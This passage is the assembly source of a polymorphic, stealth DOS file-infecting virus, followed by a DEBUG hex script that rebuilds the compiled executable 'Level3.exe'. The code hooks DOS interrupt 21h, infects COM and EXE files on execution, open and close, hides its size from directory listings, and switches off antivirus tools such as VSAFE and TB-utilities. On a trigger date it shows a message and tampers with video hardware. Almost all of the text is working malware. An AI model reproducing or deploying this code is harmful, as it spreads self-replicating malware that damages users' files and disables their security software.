cx,1 je oiok ;can infect CHKDSK oinok: stc jmp okon compare: push si mov cl,byte ptr es:[di] inc di mov ax,di add ax,cx push ax popdp: lodsb cmp al,'a' jb ponmp cmp al,'z' ja ponmp sub al,('a'-'A') ponmp: scasb loope popdp pop di pop si retn ;************** 21h handler ************* infname: ;in ds:dx is file name push ax push bx push cx push si push di push bp push ds push es call eliminate_av call set_on_24 mov ax,4300h call int21 mov cs:attrib,cx mov ax,4301h xor cx,cx call int21 jc errnd_l1 mov ax,3d02h call int21 jc errnd_l2 push dx push ds push cs pop ds push cs pop es mov handle,ax call infect mov ah,3eh call mhandle pop ds pop dx errnd_l2: mov ax,4301h db 0b9h attrib dw ? ;mov cx,attrib call int21 errnd_l1: call set_off_24 pop es pop ds pop bp pop di pop si pop cx pop bx pop ax retn res21: sti rpps1: jmp short con1 ;switched jump for switching off stealth con1: cmp ah,11h je dtrad cmp ah,12h jne dnxt dtrad: push bx push es push ax mov ah,2fh call int21 pop ax call int21 cmp al,0ffh je dterr push ax cmp byte ptr es:[bx],0ffh jne nexp add bx,7 nexp: add bx,17h call identify pop ax jnc dterr add bx,1dh-17h call sublen dterr: pop es pop bx iret dnxt: cmp ah,4eh je dffh cmp ah,4fh jne ndnxt dffh: push bx push es push ax mov ah,2fh call int21 pop ax call int21 jc ret21 push ax add bx,16h call identify pop ax jnc ret21_stc add bx,1ah-16h call sublen ret21_stc: clc ret21: pop es pop bx rf2: push ax push bp mov bp,sp lahf mov [bp+08h],ah pop bp pop ax iret ndnxt: cmp ah,31h je trmsr cmp ah,4ch jne nkprg mov byte ptr cs:(offset rpps1+1),0 trmsr: call eliminate_av nkprg: cld push dx cmp ax,4b00h je infac cmp ax,6c00h jne nxts test dl,00010010b mov dx,si jnz saveh nxts: cmp ah,3ch je saveh cmp ah,5bh je saveh cmp ah,3eh jne jornd_l21 cmp bx,cs:chandle jne jornd_l21 or bx,bx jz jornd_l21 mov cs:chandle,0 call int21 jc pdxrf2 push ds push cs pop ds mov dx,offset fname call infname pop ds miretc: clc pdxrf2: pop dx jmp rf2 jornd_l21: pop dx cli jmp cs:oriv21 infac: call check jc jornd_l21 call infname jmp short jornd_l21 saveh: cmp cs:chandle,0 jne jornd_l21 call check jc jornd_l21 mov cs:rhdx,dx pop dx push dx call int21 db 0bah rhdx dw ? ;mov dx,rhdx jc pdxrf2 push cx push si push di push es mov si,dx mov di,offset chandle push cs pop es stosw mov cx,LENFNB rep movsb pop es pop di pop si pop cx jmp short miretc NUMTBN=4 tbname db 'TBMEMXXX','TBCHKXXX','TBDSKXXX','TBFILXXX' eliminate_av: push ax push dx push ds mov ah,0ffh xor bl,bl int 13h ;eliminates NOHARD mov ah,0feh int 13h ;eliminates NOFLOPPY mov ax,0fa02h mov dx,5945h mov bl,31h int 16h ;eliminates VSAFE push cs pop ds mov ah,52h int 21h les bx,es:[bx+22h] next_device: mov si,offset tbname-8 mov cx,NUMTBN next_tb_utility: push cx add si,8 lea di,[bx+0ah] mov cx,4 push si repe cmpsw pop si pop cx loopne next_tb_utility jne not_tb_utility or byte ptr es:[0016h],01h ;eliminates TB-utility not_tb_utility: les bx,es:[bx] cmp bx,0ffffh jne next_device pop ds pop dx pop ax retn owname db 'COMMAND',00h stsub: mov ax,0000h mov cl,4 shr ax,cl mov dx,cs add ax,dx push ax mov ax,offset mdcs push ax retf ;relocation cs:ip mdcs: cld push cs pop ds mov ax,DEPTH sub ax,ssp dec cx div cl ;al=ax/3 shl ax,1 ;ax=ax*2/3 add sp,ax ;sp to orig. value ;**************** action ***************** mov cl,ORDER mov ax,counter div cl or ah,ah jnz nap mov ah,2ah int 21h cmp dl,7 jne nap mov ah,09h mov dx,offset mess1 int 21h mov dx,3cch in al,dx and al,11111101b mov dl,0c2h out dx,al mov ah,4ch int 21h nap: call eliminate_av ;eliminates AVIR mov ah,62h int 21h ;in bx PSP push bx xor ax,ax mov ds,ax mov ds,word ptr ds:(offset MEMPOS+3) cmp word ptr owname,'OC' je pinchb ;already res ;**************** instalation into memory ****************** xchg ax,bx dec ax mov ds,ax add ax,ds:[03h] sub ax,((end_res-start_virus)-1)/16+2-1 ;segment for virus is in ax mov dx,cs add dx,(LENVIR-1)/16+1 ;end of virus code cmp ax,dx jb tranw mov dx,cs add dx,cs:bheader.min ;min memory req. cmp ax,dx jb tranw mov dx,ss mov si,sp inc si mov cl,4 shr si,cl inc si add dx,si ;end of stack cmp ax,dx jnb intdp tranw: mov ah,48h mov bx,0ffffh int 21h cmp bx,((end_res-start_virus)-1)/16+2 jnb dbjdv pinchb: jmp inchb dbjdv: mov ah,48h int 21h dec ax mov ds,ax mov word ptr ds:[01h],0000h add ax,ds:[03h] sub ax,((end_res-start_virus)-1)/16+2-1 ;segment for virus is in ax intdp: mov dl,byte ptr ds:[00h] mov byte ptr ds:[00h],'M' sub word ptr ds:[03h],((end_res-start_virus)-1)/16+2 mov ds:[12h],ax mov ds,ax mov byte ptr ds:[00h],dl inc ax mov word ptr ds:[01h],ax mov word ptr ds:[03h],((end_res-start_virus)-1)/16+1 push ds pop es push cs pop ds inc counter ;generation mov si,offset owname mov di,08h movsw movsw movsw movsw ;name of owner mov es,ax xor si,si mov di,si mov cx,LENVIR rep movsb ;copying of body mov si,offset zencode mov cx,(zenden-zencode) rep movsb ;copying of necessay routines xor ax,ax mov es:chandle,ax ;initialisation of variable mov ds,ax mov ax,ds:046ch mov es:rnd1,ax mov ax,ds:046eh mov es:rnd2,ax ;initialisation rnd_get mov byte ptr ds:(offset MEMPOS),0eah mov word ptr ds:(offset MEMPOS+1),offset res21 mov word ptr ds:(offset MEMPOS+3),es cli mov ax,ds:(4*21h) mov word ptr es:oriv21,ax mov ax,ds:(4*21h+2) mov word ptr es:(oriv21+2),ax mov word ptr ds:(4*21h),MEMPOS mov ds:(4*21h+2),ds sti inchb: pop bx push cs pop ds mov es,bx mov si,offset bheader cmp [si].flag,0 jne zuEXE mov di,100h mov [si].vIP,di mov [si].vCS,bx movsb movsw jmp short zuCOM zuEXE: mov ax,cs sub ax,[si].id ;sub cs from exe header (infected) add [si].vCS,ax add ax,[si].vSS mov ss,ax zuCOM: mov ds,bx xor ax,ax jmp dword ptr cs:bheader.vIP counter dw 1250 mess1 db 0dh,0ah,'Welcome to the Explosion''s Mutation Machine !',0dh,0ah db 'Dis is level 3.',0dh,0ah,'$' end_virus label near ;************************ copied routines and heap *********************** encode: mov cx,LENVIR xor dx,dx ;offset start_virus call zp1 mov ah,40h mov bx,handle pushf db 9ah ;call oriv21 oriv21 dd ? jc ec1 cmp ax,cx ec1: pushf call zp1 popf retn zp1: push cx mov si,dx ecmax: mov ax,1234h mov cx,(LENVIR-1)/2+1 zp2: xor [si],ax ecaax1: add ax,1234h inc si xor [si],ax ecaax2: add ax,1234h inc si loop zp2 pop cx retn res24: mov al,03h iret handle dw ? header strc <> off24 dw ? seg24 dw ? ftime dw ? fdate dw ? lenlo dw ? lenhi dw ? chandle dw ? fname db LENFNB dup(?) retnaddr dw ? sodec dw ? hend dw ? ptei dw ? ei db 6*25 dup(?) eei label near rel dw ? gba dw ? eflag db ? ;input flags (0-set DS,1-set SP,2-gen. intro) hip dw ? hbuf db LENHBUF dup(?) end_res label near virus_segment ends end stsub --------------------------- N Level3.exe E 0100 4D 5A 04 01 0A 00 00 00 20 00 3D 00 FF FF 00 00 E 0110 80 00 00 00 89 0E 09 00 3E 00 00 00 01 00 FB 30 E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0380 B8 00 4C CD 21 00 00 00 00 00 00 00 00 00 00 00 E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0F E 03A0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03B0 00 00 00 01 00 00 00 00 00 10 00 1E 00 00 02 2A E 03C0 20 45 4D 4D 20 31 2E 30 20 2A 56 50 53 51 52 B9 E 03D0 00 00 BB 00 00 BA 5A 01 B8 35 4E 96 92 85 C0 74 E 03E0 02 F7 E3 E3 05 91 F7 E6 03 C1 96 F7 E3 03 D6 40 E 03F0 83 D2 00 2E A3 43 00 2E 89 16 40 00 8B C2 59 33 E 0400 D2 E3 04 F7 F1 EB 01 92 59 5B 58 5E C3 00 00 00 E 0410 00 00 00 00 04 00 00 00 08 00 00 00 0C 00 00 00 E 0420 00 00 00 00 04 00 00 00 08 00 00 00 0C 00 00 00 E 0430 00 00 00 00 00 00 50 51 52 56 33 C9 AC 98 03 C8 E 0440 3C FF AD 75 F7 41 5E 8B D1 E8 7E FF AC 98 2B C8 E 0450 AD 3B D1 72 F7 96 5A 59 58 FF E6 50 53 8B F2 D1 E 0460 E6 D1 E6 BB 7D 00 03 F3 B5 03 80 3E A5 00 00 75 E 0470 11 83 C6 03 AC 98 96 03 F3 FE CD F6 C2 04 75 02 E 0480 FE CD 5B 58 C3 51 56 BA 08 00 E8 3D FF E8 CB FF E 0490 F6 04 04 75 F2 5E 59 C3 50 32 E4 EB 03 50 B4 04 E 04A0 51 56 55 BA 08 00 E8 21 FF 8B EA 33 D2 8A CA E8 E 04B0 A9 FF AC 84 C4 75 0E 24 03 3C 03 74 04 3A C5 75 E 04C0 04 41 4D 78 12 42 83 FA 08 72 E4 0A C9 75 03 F9 E 04D0 EB 06 83 E2 07 EB D8 F8 5D 5E 59 58 C3 51 56 E8 E 04E0 79 FF 46 80 FD 03 75 04 89 04 EB 08 80 FD 01 74 E 04F0 01 46 88 04 5E 59 C3 51 56 E8 5F FF 46 80 FD 03 E 0500 75 03 AD EB 07 80 FD 01 74 01 46 AC 5E 59 C3 0A E 0510 06 A5 00 52 B1 03 D2 E2 0A E2 5A C3 E8 66 FF 52 E 0520 A0 A5 00 B1 03 D2 E0 0C B0 0A C2 AA 33 D2 E8 99 E 0530 FE 92 5A E8 A7 FF E8 22 FF 08 2C 80 FD 03 75 04 E 0540 AB EB 02 90 AA C3 E8 4F FF 72 FA E8 A9 FF 50 B8 E 0550 8A C0 0A 06 A5 00 0A E2 8B DA E8 28 FF 3B DA 74 E 0560 F9 E8 AF FF AB 58 E8 74 FF E8 EF FE 08 2C C3 2D E 0570 8C 01 2D B6 01 03 60 02 03 64 02 01 44 02 01 13 E 0580 02 01 FB 01 FF BE DF 01 E9 AB FE C6 06 A5 00 01 E 0590 F6 06 A0 00 01 75 0B E8 FE FE 72 06 B8 8E D8 0A E 05A0 E2 AB C3 C6 06 A5 00 01 BA 20 00 E8 1C FE B8 8C E 05B0 C0 0A E2 80 E4 F8 E8 CC FE 0A E2 AB E8 9C FE 80 E 05C0 E4 18 74 04 80 24 FC C3 A0 9D 00 88 04 A1 9E 00 E 05D0 89 44 01 C3 C6 06 A5 00 01 E8 BC FE 72 11 B8 8E E 05E0 C0 0A E2 AB E8 10 FF 80 0E 9D 00 03 A3 9E 00 C3 E 05F0 B0 32 EB 02 B0 2A B4 C0 E8 8A FE 0A E2 E8 5B FE E 0600 08 2C C7 06 8C 02 32 C0 EB 77 A0 A5 00 00 06 8C E 0610 02 E8 E3 FE 8B 2E A2 00 55 9D FB FC 0A C3 9C 5D E 0620 89 2E A2 00 E9 B6 FE E8 E0 FF 80 0E A1 00 01 C3 E 0630 2D F7 02 2D DE 02 0A C4 02 FF AC B4 C3 A3 8C 02 E 0640 AC A2 D6 02 AC B4 C0 A3 E8 02 AD A3 FE 02 BE A0 E 0650 02 E9 E2 FD 33 D2 E8 02 FE AC 24 03 3C 03 74 04 E 0660 3A C5 75 23 52 B0 0C 0A 06 A5 00 AA EB 29 E8 27 E 0670 FE 72 3C E8 81 FE 93 B8 0A C0 0A E2 E8 1E FE 72 E 0680 2E E8 8B FE AB EB A0 E8 13 FE 72 23 52 B8 80 C8 E 0690 0A 06 A5 00 0A E2 AB 33 D2 E8 2E FD 8B DA 5A E8 E 06A0 85 FF 93 80 3E A5 00 00 74 04 AB EB 02 90 AA C3 E 06B0 0A 0C 0A 80 C8 BE 20 03 EB 80 22 24 22 80 E0 BE E 06C0 2A 03 EB F4 32 34 32 80 F0 BE 34 03 EB EA 84 A8 E 06D0 84 F6 C0 BE 3E 03 C6 06 0F 01 00 E8 5C FF C6 06 E 06E0 0F 01 04 C3 3A 3C 3A 80 F8 BE 54 03 EB E8 02 04 E 06F0 02 80 C0 BE 5E 03 EB D4 2A 2C 2A 80 E8 BE 68 03 E 0700 EB CA 12 14 12 80 D0 BE 72 03 F6 06 A1 00 01 75 E 0710 BB C3 1A 1C 1A 80 D8 BE 82 03 EB EE 01 B7 03 01 E 0720 A5 03 FF AD A3 8C 02 AD A3 AB 03 AC A2 C2 03 BE E 0730 8C 03 E9 01 FD E8 65 FD 72 D7 B8 FE C0 0A 06 A5 E 0740 00 0A E2 AB E9 C3 FE C6 06 A5 00 01 E8 4E FD 72 E 0750 C0 B0 40 0A C2 AA E9 B1 FE FE C0 FE C0 40 BE C9 E 0760 03 EB C0 FE C8 FE C8 48 BE D3 03 EB B6 F6 D8 F6 E 0770 D8 BE DD 03 57 E8 12 00 58 3B F8 76 05 80 0E A1 E 0780 00 01 C3 F6 D0 F6 D0 BE F3 03 C7 06 A0 03 8F 03 E 0790 E8 90 FF C7 06 A0 03 8C 03 C3 01 17 04 01 3F 04 E 07A0 FF BE 0A 04 E9 8F FC E8 F3 FC 72 ED E8 48 FD 93 E 07B0 B8 86 C0 0A E2 8B EA E8 E3 FC 3B EA 74 DB 55 E8 E 07C0 4D FD AB E8 31 FD 93 E8 13 FD 5A 93 E9 0E FD C6 E 07D0 06 A5 00 01 E8 C6 FC 72 C0 80 3E 7D 00 03 75 B9 E 07E0 E8 14 FD 93 B0 90 0A C2 52 33 D2 AA EB D5 B0 D0 E 07F0 F6 06 81 00 01 74 0E BA 02 00 E8 CD FB D0 E2 0A E 0800 C2 8A 0E 82 00 A3 8C 02 E8 92 FC 72 27 80 26 A1 E 0810 00 FE E9 28 FF B4 E0 EB D5 B4 E8 EB D1 B4 F8 EB E 0820 CD B4 C0 EB C9 B4 C8 EB C5 B4 D0 F6 06 A1 00 01 E 0830 74 02 EB BA C3 B4 D8 EB F2 0F C5 04 03 EC 04 01 E 0840 07 05 FF 83 3E 0F 00 00 74 EA BE A9 04 C6 06 A5 E 0850 00 01 E9 E1 FB E8 2D FC B0 50 0A C2 AA E8 FB FB E 0860 AC 91 E8 92 FC 83 2E 0F 00 03 83 2E 8E 00 02 8B E 0870 36 0F 00 88 8C 00 00 89 84 01 00 C3 BA 20 00 E8 E 0880 48 FB 92 0C 06 24 FE AA 32 C9 3C 06 75 D7 A1 9E E 0890 00 8A 0E 9D 00 EB CE B0 9C EB EC 0F 24 05 02 4F E 08A0 05 01 5D 05 03 69 05 FF 83 3E 0F 00 0F 74 85 BE E 08B0 0B 05 EB 99 E8 CE FB B0 58 0A C2 AA E8 09 00 E8 E 08C0 99 FB 88 0C E8 16 FC C3 8B 36 0F 00 8A 8C 00 00 E 08D0 8B 84 01 00 83 06 0F 00 03 83 06 8E 00 02 C3 B0 E 08E0 07 AA E8 E3 FF 88 0E 9D 00 A3 9E 00 C3 F6 06 A0 E 08F0 00 01 75 F8 B0 1F AA EB CF F6 06 A0 00 01 75 EC E 0900 B8 0E 1F AB 80 0E A0 00 01 C3 50 51 52 8B CA E3 E 0910 09 33 D2 E8 B4 FA 92 AA E2 F7 5A 59 58 C3 E8 A9 E 0920 FA 03 F2 AC C3 77 73 72 76 74 7F 7D 7C 7E EB 75 E 0930 71 7B 79 70 7A 78 E3 E2 E1 E0 18 BD 05 05 F7 05 E 0940 01 10 06 03 1F 06 FF BE AA 05 E9 E9 FA F6 06 A1 E 0950 00 01 74 32 BE 95 05 BA 11 00 E8 C1 FF AA A2 DB E 0960 05 8B 0E 82 00 8B 2E A2 00 55 9D EB 09 33 D2 E8 E 0970 58 FA 92 AA EB 0C BA 14 00 E8 4E FA 8A C2 AA E8 E 0980 88 FF 89 0E 82 00 C3 80 3E 81 00 03 75 F8 BE A6 E 0990 05 BA 02 00 F6 06 A1 00 01 74 BF BA 04 00 EB BA E 09A0 B0 E9 AA BA 14 00 E8 21 FA 8B C2 AB E9 5B FF F6 E 09B0 06 7E 11 04 74 D0 B0 E8 AA A1 DC 10 48 48 2B C7 E 09C0 AB C3 FB FA FD FC BE 32 06 BA 04 00 E8 4F FF AA E 09D0 C3 04 54 06 04 61 06 04 6E 06 01 7B 06 FF BE 41 E 09E0 06 E9 52 FA 8B 2E 96 00 B4 84 80 3E 95 00 03 74 E 09F0 1E 8B 2E 9A 00 B4 85 80 3E 99 00 03 74 11 8B 2E E 0A00 8A 00 B4 87 80 3E 89 00 03 74 04 33 ED B4 06 C3 E 0A10 F6 06 A0 00 01 75 04 C6 05 2E 47 C3 E8 79 FA 72 E 0A20 3F 50 E8 D2 FA 0A C0 58 74 36 E8 E6 FA 0A 06 A5 E 0A30 00 E8 DC FF AB 8B 36 E2 10 89 04 E8 B9 FA 89 44 E 0A40 04 BA 21 00 2A 16 A5 00 E8 7F F9 89 54 02 83 06 E 0A50 E2 10 06 A1 DE 10 03 C2 2B C5 AB 80 26 A1 00 FE E 0A60 C3 06 08 08 02 02 00 F7 06 00 FB 06 00 FF 06 00 E 0A70 03 07 00 25 07 FF 81 3E E2 10 7A 11 73 E2 E8 5D E 0A80 FF BE D6 06 E9 AF F9 B0 30 EB 91 B0 00 EB 8D B0 E 0A90 28 EB 89 B0 D0 BA 04 00 E8 2F F9 0B D2 74 10 F6 E 0AA0 06 81 00 01 74 09 80 3E 82 00 00 74 02 0C 02 BA E 0AB0 01 00 E9 78 FF 80 CC 08 EB D9 05 3A 07 01 68 07 E 0AC0 FF E8 1A FF BE 2A 07 E9 6C F9 E8 B8 F9 B0 8A E8 E 0AD0 3D FA 52 E8 3A FF AB 8B D7 81 EA 82 11 E8 EA F8 E 0AE0 A1 7A 11 03 C2 2B C5 AB 92 5A E8 6E F9 08 2C BE E 0AF0 81 11 03 F0 AD E9 E5 F9 E8 9D F9 72 17 B0 88 E8 E 0B00 0D FA E8 0B FF AB BA 0E 00 E8 BE F8 A1 7C 11 03 E 0B10 C2 2B C5 AB C3 0D B7 05 20 E6 06 11 31 07 46 F5 E 0B20 01 01 36 06 10 B3 04 10 18 05 04 85 04 04 89 04 E 0B30 02 8D 04 02 91 04 02 95 04 02 99 04 02 A5 04 07 E 0B40 25 03 07 2F 03 04 39 03 04 43 03 09 63 03 09 6D E 0B50 03 02 77 03 02 87 03 04 59 03 04 CE 03 04 D8 03 E 0B60 04 11 04 02 E1 03 02 F7 03 FF FC B9 0A 00 BF 7D E 0B70 00 33 C0 AA 83 C7 03 E2 FA 93 A0 7E 11 24 01 A2 E 0B80 A0 00 B0 04 F6 06 7E 11 02 74 02 0C 03 08 06 8D E 0B90 00 C7 06 0F 00 0F 00 C7 06 E2 10 E4 10 B9 05 00 E 0BA0 BE D1 06 BF D6 06 AC 98 92 E8 1E F8 92 03 D8 AA E 0BB0 47 47 E2 F2 0B DB 74 E5 BF 81 11 B8 FF FF 50 F6 E 0BC0 06 7E 11 04 74 1E 58 BA 63 00 E8 FD F7 42 52 52 E 0BD0 E8 F7 F7 E8 34 FD 89 3E DC 10 B0 C3 AA 58 2B C2 E 0BE0 92 E8 26 FD 8B C7 2D 81 11 03 06 7A 11 A3 7F 11 E 0BF0 BA 0C 01 58 2B D0 E8 D1 F7 03 D0 81 C2 90 01 89 E 0C00 16 E0 10 81 06 E0 10 81 11 03 16 7A 11 89 16 DE E 0C10 10 C7 06 9E 08 85 07 C6 06 A5 08 00 57 BA 03 00 E 0C20 E8 A7 F7 0A D2 74 02 B2 01 88 16 A5 00 BE 85 07 E 0C30 E8 03 F8 58 EB 00 57 83 C7 16 3B 3E E0 10 5F 72 E 0C40 DB C7 06 9E 08 8E 07 C6 06 A5 08 18 EB CE 3B 3E E 0C50 E0 10 72 C8 97 75 C5 97 8B DF B8 B7 0F 2B C7 A3 E 0C60 38 09 BE 21 09 B9 21 00 F3 A4 8B 36 E2 10 81 FE E 0C70 E4 10 76 3C 83 EE 06 8A 04 8A D0 80 E2 FC 80 FA E 0C80 00 75 02 0C 28 80 FA 28 75 02 24 03 B4 8F 81 24 E 0C90 FC 38 81 3C D0 08 75 03 80 E4 C7 A3 1A 09 8B 54 E 0CA0 02 89 16 1C 09 8B 4C 04 EB 00 31 8F 34 12 EB BE E 0CB0 C3 FB 0E 1F BE 34 12 B8 34 12 B9 1D 08 31 04 EB E 0CC0 09 05 34 12 46 E2 F6 E9 00 00 05 34 12 46 31 04 E 0CD0 EB EF B9 3A 10 33 D2 E8 16 00 B4 40 8B 1E 74 10 E 0CE0 9C 9A 00 00 00 00 72 02 3B C1 9C E8 02 00 9D C3 E 0CF0 51 8B F2 B8 34 12 B9 1D 08 31 04 05 34 12 46 31 E 0D00 04 05 34 12 46 E2 F2 59 C3 B0 03 CF 52 1E 0E 1F E 0D10 B8 24 35 E8 65 00 8C 06 90 10 89 1E 8E 10 B8 24 E 0D20 25 BA 71 10 E8 54 00 1F 5A C3 B8 24 25 2E C5 16 E 0D30 8E 10 E8 46 00 C3 52 26 8B 47 02 40 33 D2 2E F7 E 0D40 36 2B 00 26 8B 07 24 1F 3A C2 F9 74 09 26 8B 07 E 0D50 25 E0 FF 0A C2 F8 5A C3 B4 40 EB 02 B4 3F E8 15 E 0D60 00 72 02 3B C1 C3 33 C9 8B D1 B8 00 42 EB 07 33 E 0D70 C9 8B D1 B8 02 42 2E 8B 1E 74 10 9C FA 2E FF 1E E 0D80 4A 10 C3 B8 00 57 E8 ED FF BB 92 10 89 0F 89 57 E 0D90 02 E8 A2 FF 73 01 C3 33 D2 E8 2E F6 89 16 28 09 E 0DA0 89 16 5C 10 33 D2 E8 21 F6 89 16 3B 09 89 16 64 E 0DB0 10 33 D2 E8 14 F6 89 16 32 09 89 16 6A 10 E8 A5 E 0DC0 FF B9 18 00 BA 76 10 E8 92 FF 72 CA 8B F2 BF 11 E 0DD0 00 F3 A4 52 E8 98 FF A3 96 10 89 16 98 10 8B F0 E 0DE0 8B FA 5B 81 3F 5A 4D 74 18 81 3F 4D 5A 74 12 C6 E 0DF0 06 23 00 00 3D 79 EC 77 9D C7 06 1B 00 00 00 EB E 0E00 2B C6 06 23 00 01 8B 47 04 F7 26 2D 00 2B C6 1B E 0E10 D7 72 B7 8B C6 8B D7 05 06 13 83 D2 00 F7 36 2D E 0E20 00 0B D2 74 01 40 89 47 04 89 57 02 83 E6 F0 83 E 0E30 C6 10 83 D7 00 8B D6 8B CF 53 E8 2D FF 5B 80 3E E 0E40 23 00 00 75 17 C6 07 E9 05 00 01 A3 7C 11 05 3A E 0E50 10 A3 7A 11 C6 06 7E 11 01 90 EB 51 8B 47 08 F7 E 0E60 26 29 00 2B F0 1B FA 8B C6 8B D7 F7 36 29 00 89 E 0E70 47 16 A3 11 00 8B 47 0E F7 26 29 00 8B 4F 10 03 E 0E80 C1 83 D2 00 2B C6 1B D7 72 0D 2D 80 00 83 DA 00 E 0E90 72 5A 81 47 0E 30 01 C7 06 7A 11 3A 10 C7 06 7C E 0EA0 11 00 00 89 0E 8E 00 C6 06 7E 11 02 90 A1 7C 11 E 0EB0 A3 25 09 A3 8A 0E BA 06 00 E8 0E F5 0B D2 74 05 E 0EC0 80 0E 7E 11 04 E8 A2 FC E8 FF 04 72 1F A1 7F 11 E 0ED0 80 3E 23 00 00 75 08 2D 03 01 A3 77 10 EB 03 A3 E 0EE0 8A 10 8B CF BA 81 11 2B CA E8 6C FE 72 2B E8 75 E 0EF0 FE B9 18 00 BA 76 10 E8 5E FE 72 1D 81 06 96 10 E 0F00 06 13 83 16 98 10 00 BA 19 00 E8 BD F4 0B D2 74 E 0F10 08 BB 92 10 E8 1F FE 89 07 8B 16 96 10 8B 0E 98 E 0F20 10 E8 46 FE 33 C9 E8 2F FE B8 01 57 8B 0E 92 10 E 0F30 8B 16 94 10 E8 3F FE C3 26 81 2F 06 13 26 83 5F E 0F40 02 00 73 0A 26 81 07 06 13 26 83 57 02 00 C3 03 E 0F50 43 4F 4D 03 45 58 45 04 53 43 41 4E 07 56 53 48 E 0F60 49 45 4C 44 05 43 4C 45 41 4E 08 46 49 4E 44 56 E 0F70 49 52 55 05 47 55 41 52 44 08 56 49 56 45 52 49 E 0F80 46 59 02 54 42 02 2D 56 07 56 49 52 53 54 4F 50 E 0F90 03 4E 4F 44 04 48 49 45 57 05 50 41 53 43 41 07 E 0FA0 4E 45 54 45 4E 56 49 06 46 2D 50 52 4F 54 06 43 E 0FB0 48 4B 44 53 4B 53 51 56 57 1E 06 50 8B F2 8B DE E 0FC0 33 FF B9 40 00 AC 3C 5C 74 08 3C 2F 74 04 3C 3A E 0FD0 75 02 8B DE 3C 2E 75 02 8B FE 0A C0 74 04 E2 E5 E 0FE0 EB 45 3B FB 76 41 8B F7 BF BF 0B 0E 07 E8 3A 00 E 0FF0 74 05 E8 35 00 75 30 B1 0F 8B F3 BF C7 0B 51 E8 E 1000 28 00 59 74 0B E2 F7 F8 58 07 1F 5F 5E 59 5B C3 E 1010 83 F9 02 77 0D 58 50 80 FC 4B 75 06 2E C6 06 0A E 1020 0D 6C 83 F9 01 74 E0 F9 EB DE 56 26 8A 0D 47 8B E 1030 C7 03 C1 50 AC 3C 61 72 06 3C 7A 77 02 2C 20 AE E 1040 E1 F2 5F 5E C3 50 53 51 56 57 55 1E 06 E8 75 01 E 1050 E8 B9 FC B8 00 43 E8 22 FD 2E 89 0E F7 0C B8 01 E 1060 43 33 C9 E8 15 FD 72 24 B8 02 3D E8 0D FD 72 13 E 1070 52 1E 0E 1F 0E 07 A3 74 10 E8 07 FD B4 3E E8 F5 E 1080 FC 1F 5A B8 01 43 B9 00 00 E8 EF FC E8 9B FC 07 E 1090 1F 5D 5F 5E 59 5B 58 C3 FB EB 00 80 FC 11 74 05 E 10A0 80 FC 12 75 2C 53 06 50 B4 2F E8 CE FC 58 E8 CA E 10B0 FC 3C FF 74 19 50 26 80 3F FF 75 03 83 C3 07 83 E 10C0 C3 17 E8 71 FC 58 73 06 83 C3 06 E8 6A FE 07 5B E 10D0 CF 80 FC 4E 74 05 80 FC 4F 75 2C 53 06 50 B4 2F E 10E0 E8 98 FC 58 E8 94 FC 72 11 50 83 C3 16 E8 46 FC E 10F0 58 73 06 83 C3 04 E8 3F FE F8 07 5B 50 55 8B EC E 1100 9F 88 66 08 5D 58 CF 80 FC 31 74 0B 80 FC 4C 75 E 1110 09 2E C6 06 0A 0D 00 E8 AB 00 FC 52 3D 00 4B 74 E 1120 47 3D 00 6C 75 07 F6 C2 12 8B D6 75 45 80 FC 3C E 1130 74 40 80 FC 5B 74 3B 80 FC 3E 75 25 2E 3B 1E 9A E 1140 10 75 1E 0B DB 74 1A 2E C7 06 9A 10 00 00 E8 2A E 1150 FC 72 0B 1E 0E 1F BA 9C 10 E8 E9 FE 1F F8 5A EB E 1160 9B 5A FA 2E FF 2E 4A 10 E8 4A FE 72 F4 E8 D5 FE E 1170 EB EF 2E 83 